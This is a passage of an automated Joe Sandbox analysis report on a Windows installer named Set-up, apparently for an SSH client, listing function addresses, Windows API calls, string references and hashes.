                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: !af_$NumCast$first < last$ncvector<unsigned int>::assign$value >= 0
                                                                                                                                  • API String ID: 0-1978602762
                                                                                                                                  • Opcode ID: 16e07bbdb0e62535989f6f6b0d1be0c35e63ffd2c4957aded5ad9e5086bdb2d5
                                                                                                                                  • Instruction ID: 62922832f85aa50bdcee58b45daf38dd7e4415840d41c9235781e56747531cb5
                                                                                                                                  • Opcode Fuzzy Hash: 16e07bbdb0e62535989f6f6b0d1be0c35e63ffd2c4957aded5ad9e5086bdb2d5
                                                                                                                                  • Instruction Fuzzy Hash: 731129F27902067BD718ABA5AD46F56B3C8AB70714F00122DFA557B1C1EBB1E901C6E4
                                                                                                                                  Function 0111D01A Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(?,00000000,0111D011,0111AB4D,460C02D8,?,00E5119D,00E4FCD0,00E3A8EB,460C02D8), ref: 0111D028
                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0111D036
                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0111D04F
                                                                                                                                  • SetLastError.KERNEL32(00000000,00000000,0111D011,0111AB4D,460C02D8,?,00E5119D,00E4FCD0,00E3A8EB,460C02D8), ref: 0111D0A1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3852720340-0
                                                                                                                                  • Opcode ID: aed4f0cbde9c709dd9341b06f352cf77666e33908bcc2ef0d76d2d3bd87d1554
                                                                                                                                  • Instruction ID: a434b9aa113e428b5978d1edca3af12e9ed421b353ae8a8e7554a0a8adf10d2f
                                                                                                                                  • Opcode Fuzzy Hash: aed4f0cbde9c709dd9341b06f352cf77666e33908bcc2ef0d76d2d3bd87d1554
                                                                                                                                  • Instruction Fuzzy Hash: E501DD321092365FEF3E25F87CD8A6BAB88DB017B4720033AE514D00DDFF5298469641
                                                                                                                                  Function 00F13070 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 55COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(?,460C02D8,00000000,00000000), ref: 00F130A1
                                                                                                                                  • QueryPerformanceCounter.KERNEL32(00000000,?,460C02D8,00000000,00000000), ref: 00F130B6
                                                                                                                                  • GetLastError.KERNEL32(00000001,?,460C02D8,00000000,00000000), ref: 00F130C2
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00F130EB
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,460C02D8,00000000,00000000), ref: 00F13103
                                                                                                                                  Strings
                                                                                                                                  • QueryPerformanceCounter(), xrefs: 00F130D0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$CounterEnterErrorExceptionException@8LastLeavePerformanceQueryRaiseThrow
                                                                                                                                  • String ID: QueryPerformanceCounter()
                                                                                                                                  • API String ID: 3202828375-1461196644
                                                                                                                                  • Opcode ID: 290d6d2164ce3f87f1c9634b403d61997d70bea0e733c26c7bc43dde67cb9f61
                                                                                                                                  • Instruction ID: 9acd49d71d9161d28d9f90166d24c4e0f7a582cd5da2aacfd5e469c61cffb4d4
                                                                                                                                  • Opcode Fuzzy Hash: 290d6d2164ce3f87f1c9634b403d61997d70bea0e733c26c7bc43dde67cb9f61
                                                                                                                                  • Instruction Fuzzy Hash: CD119D71905205AFCB24DF69C985B9EBBFCFB09B14F10066AE811E3380DBB065048BA1
                                                                                                                                  Function 00E7F2E0 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 398COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00E6CE60: RegCloseKey.ADVAPI32(012A03EC,460C02D8,?), ref: 00E6CEA1
                                                                                                                                  • new.LIBCMT ref: 00E7F419
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close
                                                                                                                                  • String ID: !af_$BvUpdateManager::Load$datavect<unsigned char>::empty
                                                                                                                                  • API String ID: 3535843008-4123486968
                                                                                                                                  • Opcode ID: 755390490dc04309d5dbb2151169ae1230fd2a6b044ced19597f063df1cac139
                                                                                                                                  • Instruction ID: d298b52739258c7962bc4475746b9f2ecddb65de3b91fec1a92ba5258f6e547a
                                                                                                                                  • Opcode Fuzzy Hash: 755390490dc04309d5dbb2151169ae1230fd2a6b044ced19597f063df1cac139
                                                                                                                                  • Instruction Fuzzy Hash: 92F1AC70D04249DFEF15CFA4C954BEEBBB0AF14308F2481ADE4097B281DBB66A44CB91
                                                                                                                                  Function 00E73430 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 125COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(?,460C02D8,00000000), ref: 00E7346F
                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,00000000), ref: 00E734BE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                  • String ID: X$X$BvUpdateManager::Thread::Execute$param.Get() && param->m_result.Get()
                                                                                                                                  • API String ID: 3168844106-899597624
                                                                                                                                  • Opcode ID: e782c2e1a1f73011aba48167179618294e5f419bb449730018b8bc1205761b89
                                                                                                                                  • Instruction ID: 5aa08c9d1abc5e06171c950e94fef069fbde1a0e0a13eaba44a45cf69da77cdf
                                                                                                                                  • Opcode Fuzzy Hash: e782c2e1a1f73011aba48167179618294e5f419bb449730018b8bc1205761b89
                                                                                                                                  • Instruction Fuzzy Hash: AC41AD74A04345EFDB25DF68C881BAEFBF4EF05308F148099E945A7782C775AA04DBA1
                                                                                                                                  Function 00E629A0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 222COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • new.LIBCMT ref: 00E62A10
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131B8F8,460C02D8,?,?,?,?,?,?,?,01167728), ref: 00E62AC9
                                                                                                                                  Strings
                                                                                                                                  • !af_, xrefs: 00E62A56
                                                                                                                                  • datavect<struct SshClient::BvConsole::CaptureEntry *>::size, xrefs: 00E62A51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalEnterSection
                                                                                                                                  • String ID: !af_$datavect<struct SshClient::BvConsole::CaptureEntry *>::size
                                                                                                                                  • API String ID: 1904992153-191288321
                                                                                                                                  • Opcode ID: ae4c7cd0f4406a892c3dca12c423211cdad48aea62211c69e01f667e426d8f6f
                                                                                                                                  • Instruction ID: 33f7548c011acf620dd0231d069f6e7c262871a250f2c381f07ad2813826cb01
                                                                                                                                  • Opcode Fuzzy Hash: ae4c7cd0f4406a892c3dca12c423211cdad48aea62211c69e01f667e426d8f6f
                                                                                                                                  • Instruction Fuzzy Hash: 8571D371E44648AFCF24DFA8E844BAEBBF8EB04354F00566DE921B7380DB30A904CB50
                                                                                                                                  Function 00E48140 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 171fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00E48350: GetFileSizeEx.KERNEL32(?,?), ref: 00E4839C
                                                                                                                                  • WriteFile.KERNEL32(?,?,00010000,?,00000000,460C02D8), ref: 00E48295
                                                                                                                                    • Part of subcall function 00E44630: IsDebuggerPresent.KERNEL32(460C02D8,0131B928,?,?), ref: 00E4465E
                                                                                                                                    • Part of subcall function 00E44630: DebugBreak.KERNEL32 ref: 00E44668
                                                                                                                                    • Part of subcall function 00E44630: GetModuleFileNameA.KERNEL32(00000000,?,0000012B), ref: 00E446D2
                                                                                                                                    • Part of subcall function 00E44630: Concurrency::cancel_current_task.LIBCPMT ref: 00E44742
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$BreakConcurrency::cancel_current_taskDebugDebuggerModuleNamePresentSizeWrite
                                                                                                                                  • String ID: !af_ && i<s_$WriteFile()$datavect<unsigned char>::operator []
                                                                                                                                  • API String ID: 1519757512-2157800795
                                                                                                                                  • Opcode ID: c13d421e52167bff1dabdccefb49eaa21159e99a7029f3b4d196a78f4d14aead
                                                                                                                                  • Instruction ID: 5dd75d8d0027220f92fcd8914b6e57eea11abb27989541923fd10c30d8640ffb
                                                                                                                                  • Opcode Fuzzy Hash: c13d421e52167bff1dabdccefb49eaa21159e99a7029f3b4d196a78f4d14aead
                                                                                                                                  • Instruction Fuzzy Hash: 2061C171A047499FCB28CFA5E584B9EBBF4EF54314F14822EE855A7290DBB1A904CB90
                                                                                                                                  Function 00E64430 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 145COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetFileType.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00E6444B
                                                                                                                                  • GetFileSizeEx.KERNEL32(?), ref: 00E64481
                                                                                                                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00E6452E
                                                                                                                                  Strings
                                                                                                                                  • !af_ && i<length(), xrefs: 00E644AD
                                                                                                                                  • basic_ncstring<wchar_t>::operator [], xrefs: 00E644A8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$SizeType___std_exception_copy
                                                                                                                                  • String ID: !af_ && i<length()$basic_ncstring<wchar_t>::operator []
                                                                                                                                  • API String ID: 4171821136-589021327
                                                                                                                                  • Opcode ID: a5b6d60eeedd3527252597a1ffbf10d5cf73c41be325ecb29c4dc37fdabdd9b5
                                                                                                                                  • Instruction ID: 96fc55adc21156932cddced78738466d8fff9b7fd4d24990a44f333df96dda16
                                                                                                                                  • Opcode Fuzzy Hash: a5b6d60eeedd3527252597a1ffbf10d5cf73c41be325ecb29c4dc37fdabdd9b5
                                                                                                                                  • Instruction Fuzzy Hash: 8551AAB4650204DFD725CF08E845BAABBF8FB49328F248559E865AB395D772ED04CB80
                                                                                                                                  Function 00E75CB0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 139COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • new.LIBCMT ref: 00E75CE2
                                                                                                                                  • new.LIBCMT ref: 00E75CF5
                                                                                                                                    • Part of subcall function 01119334: Concurrency::cancel_current_task.LIBCPMT ref: 0111934C
                                                                                                                                  • new.LIBCMT ref: 00E75D42
                                                                                                                                  Strings
                                                                                                                                  • result.IsType<DownloadAndStartResult>(), xrefs: 00E75E6A
                                                                                                                                  • BvUpdateManager::RunDownloadAndStartUpdateThread, xrefs: 00E75E65
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Concurrency::cancel_current_task
                                                                                                                                  • String ID: BvUpdateManager::RunDownloadAndStartUpdateThread$result.IsType<DownloadAndStartResult>()
                                                                                                                                  • API String ID: 118556049-2401601241
                                                                                                                                  • Opcode ID: dfbc4219ccffbc89e08ee4420943fe642b57bc92b6ab61daa79aec51ae7f8736
                                                                                                                                  • Instruction ID: 4ecfe5a3474e1e962abcbdad27f533134191481352c9258dd68aa65c1cb21807
                                                                                                                                  • Opcode Fuzzy Hash: dfbc4219ccffbc89e08ee4420943fe642b57bc92b6ab61daa79aec51ae7f8736
                                                                                                                                  • Instruction Fuzzy Hash: 2451AFB1905349DAEB10DFA4C905B9EBBF4EF00708F10805DE519BB2C1DBF6AA04CBA1
                                                                                                                                  Function 00F7A760 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 131COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00F7A887
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
